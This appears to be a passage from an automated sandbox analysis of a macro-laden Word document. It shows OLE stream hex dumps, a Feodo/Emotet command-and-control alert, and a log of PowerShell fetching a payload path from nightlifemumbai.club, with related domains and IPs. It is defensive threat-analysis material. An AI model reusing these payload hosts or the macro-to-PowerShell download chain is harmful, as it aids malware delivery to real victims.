                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 328
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:328
                                            Entropy:3.23202847131
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 18 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 500
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:500
                                            Entropy:3.86071015332
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 5c 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 6881
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:6881
                                            Entropy:6.01925086237
                                            Base64 Encoded:True
                                            Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 531
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:531
                                            Entropy:5.60149373099
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { D C 6 D B B 0 F - 4 4 C C - 4 3 0 C - 8 E B 1 - D C E F F 4 E 8 4 C 3 4 } " . . D o c u m e n t = Y n z y s n u y y f i h f q 2 3 d / & H 0 0 0 0 0 0 0 0 . . M o d u l e = P c 1 n z n t n i q j _ d u r 5 1 . . M o d u l e = J l z k 8 q s q c s h l 6 j k . . E x e N a m e 3 2 = " R w 9 v _ p l t f h q t u 0 d 2 w " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F B F 9 B D 4 5 3 3 4 9 3 3 4 9 3 3 4 9 3 3 4
                                            Data Raw:49 44 3d 22 7b 44 43 36 44 42 42 30 46 2d 34 34 43 43 2d 34 33 30 43 2d 38 45 42 31 2d 44 43 45 46 46 34 45 38 34 43 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 59 6e 7a 79 73 6e 75 79 79 66 69 68 66 71 32 33 64 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 50 63 31 6e 7a 6e 74 6e 69 71 6a 5f 64 75 72 35 31 0d 0a 4d 6f 64 75 6c 65 3d 4a 6c 7a 6b 38 71 73 71 63 73 68
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 158
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:158
                                            Entropy:3.75845137034
                                            Base64 Encoded:False
                                            Data ASCII:Y n z y s n u y y f i h f q 2 3 d . Y . n . z . y . s . n . u . y . y . f . i . h . f . q . 2 . 3 . d . . . P c 1 n z n t n i q j _ d u r 5 1 . P . c . 1 . n . z . n . t . n . i . q . j . _ . d . u . r . 5 . 1 . . . J l z k 8 q s q c s h l 6 j k . J . l . z . k . 8 . q . s . q . c . s . h . l . 6 . j . k . . . . .
                                            Data Raw:59 6e 7a 79 73 6e 75 79 79 66 69 68 66 71 32 33 64 00 59 00 6e 00 7a 00 79 00 73 00 6e 00 75 00 79 00 79 00 66 00 69 00 68 00 66 00 71 00 32 00 33 00 64 00 00 00 50 63 31 6e 7a 6e 74 6e 69 71 6a 5f 64 75 72 35 31 00 50 00 63 00 31 00 6e 00 7a 00 6e 00 74 00 6e 00 69 00 71 00 6a 00 5f 00 64 00 75 00 72 00 35 00 31 00 00 00 4a 6c 7a 6b 38 71 73 71 63 73 68 6c 36 6a 6b 00 4a 00 6c 00
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4827
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:4827
                                            Entropy:5.51290275717
                                            Base64 Encoded:False
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                            Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 637
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:data
                                            Stream Size:637
                                            Entropy:6.3067929208
                                            Base64 Encoded:True
                                            Data ASCII:. y . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . k . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                            Data Raw:01 79 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 13 6b fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                            Stream Path: WordDocument, File Type: data, Stream Size: 95711
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:95711
                                            Entropy:6.59080514362
                                            Base64 Encoded:True
                                            Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . q . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . b . . . b . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 71 94 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 df 75 01 00 62 7f 00 00 62 7f 00 00 71 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                            Stream Path: office, File Type: data, Stream Size: 1119
                                            General
                                            Stream Path:office
                                            File Type:data
                                            Stream Size:1119
                                            Entropy:7.82778611779
                                            Base64 Encoded:False
                                            Data ASCII:. ~ . h . . n . . . } v . . . 9 . . . . . D p 8 . . . . . W i . . . d . . . u b . . . . y . e . $ . ] a . ? < . . . . \\ C . . t . . . . . . 1 . I Y . . . ` . h . . . . . . . o . . . { A . . . . ! . { g F } x o i . 6 % K . . . i @ . . . { . . V u . . . . 0 ; . . . . C . . . I . . . . J ^ . @ . . . Z G > . . m . . . . . . . . . o R . . h j . } 2 . . U . . . } . . X . . . . . . . . < . . . . . 0 . . r # o n . . . . a . . . . < . . . . U . l . . x f . . G . . . . ( . . . j . I . . * . . . I 4 R 8 . y . . . : .
                                            Data Raw:d1 7e c4 68 de cf 6e 9f cb f9 7d 76 05 f4 a8 39 06 be bb b1 f1 44 70 38 96 81 8c e6 b4 57 69 80 af e6 64 fc 08 12 75 62 96 00 96 10 79 2e 65 0c 24 a0 5d 61 90 3f 3c 8d 0d 8c d1 5c 43 88 ea 74 90 fd c6 1e 8f ac 31 f4 49 59 1a f0 ae 60 be 68 1c 7f c1 13 f9 08 ef 6f a9 d7 ee 7b 41 18 1e 0e 15 21 80 7b 67 46 7d 78 6f 69 18 36 25 4b de ad cd 69 40 c4 c6 d6 7b 87 0e 56 75 b7 bd b5 b2 30

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/25/21-23:14:06.187776TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 124916780192.168.2.22190.55.186.229

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 25, 2021 23:13:52.280585051 CET4916580192.168.2.22172.217.6.174
                                            Jan 25, 2021 23:13:52.434391975 CET8049165172.217.6.174192.168.2.22
                                            Jan 25, 2021 23:13:52.434695005 CET4916580192.168.2.22172.217.6.174
                                            Jan 25, 2021 23:13:52.437289953 CET4916580192.168.2.22172.217.6.174
                                            Jan 25, 2021 23:13:52.591016054 CET8049165172.217.6.174192.168.2.22
                                            Jan 25, 2021 23:13:52.591087103 CET8049165172.217.6.174192.168.2.22
                                            Jan 25, 2021 23:13:52.591124058 CET8049165172.217.6.174192.168.2.22
                                            Jan 25, 2021 23:13:52.591306925 CET4916580192.168.2.22172.217.6.174
                                            Jan 25, 2021 23:13:52.666049957 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:52.707462072 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:52.707673073 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:52.716353893 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:52.756455898 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:52.760782003 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:52.760840893 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:52.761022091 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:52.777035952 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:52.817164898 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:52.817306042 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.027378082 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:53.061552048 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.061760902 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:53.069067001 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:53.109160900 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864087105 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864135981 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864173889 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864200115 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864238977 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864274025 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864317894 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864316940 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:53.864345074 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864384890 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864423990 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864449978 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864486933 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:53.864525080 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:53.864535093 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:53.864537954 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:53.864541054 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.072763920 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.102535963 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102585077 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102616072 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102644920 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102684021 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102713108 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102751017 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102777004 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102816105 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102844954 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102893114 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102904081 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.102926016 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.102937937 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.102942944 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.102946997 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.103010893 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.107592106 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.107825994 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113141060 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113176107 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113213062 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113250017 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113285065 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113295078 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113317013 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113322020 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113359928 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113390923 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113430977 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113461018 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113497972 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113535881 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113544941 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113563061 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113574028 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113621950 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113655090 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113656998 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113692999 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113732100 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113734961 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113770008 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113806009 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113810062 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113848925 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113879919 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113888025 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113928080 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.113960981 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.113970041 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.114007950 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.114037037 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.114047050 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.114075899 CET44349166104.21.88.166192.168.2.22
                                            Jan 25, 2021 23:13:54.114140987 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.115009069 CET49166443192.168.2.22104.21.88.166
                                            Jan 25, 2021 23:13:54.344427109 CET44349166104.21.88.166192.168.2.22

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 25, 2021 23:13:52.213778973 CET5219753192.168.2.228.8.8.8
                                            Jan 25, 2021 23:13:52.261915922 CET53521978.8.8.8192.168.2.22
                                            Jan 25, 2021 23:13:52.616822958 CET5309953192.168.2.228.8.8.8
                                            Jan 25, 2021 23:13:52.665087938 CET53530998.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 25, 2021 23:13:52.213778973 CET192.168.2.228.8.8.80xd372Standard query (0)nightlifemumbai.clubA (IP address)IN (0x0001)
                                            Jan 25, 2021 23:13:52.616822958 CET192.168.2.228.8.8.80x7032Standard query (0)shop.nowfal.devA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 25, 2021 23:13:52.261915922 CET8.8.8.8192.168.2.220xd372No error (0)nightlifemumbai.club172.217.6.174A (IP address)IN (0x0001)
                                            Jan 25, 2021 23:13:52.665087938 CET8.8.8.8192.168.2.220x7032No error (0)shop.nowfal.dev104.21.88.166A (IP address)IN (0x0001)
                                            Jan 25, 2021 23:13:52.665087938 CET8.8.8.8192.168.2.220x7032No error (0)shop.nowfal.dev172.67.151.106A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • nightlifemumbai.club
                                            • 190.55.186.229

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249165172.217.6.17480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 25, 2021 23:13:52.437289953 CET0OUTGET /x/0wBD3/ HTTP/1.1
                                            Host: nightlifemumbai.club
                                            Connection: Keep-Alive
                                            Jan 25, 2021 23:13:52.591087103 CET1INHTTP/1.1 404 Not Found
                                            Content-Type: text/html; charset=UTF-8
                                            Referrer-Policy: no-referrer
                                            Content-Length: 1569
                                            Date: Mon, 25 Jan 2021 22:13:52 GMT
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 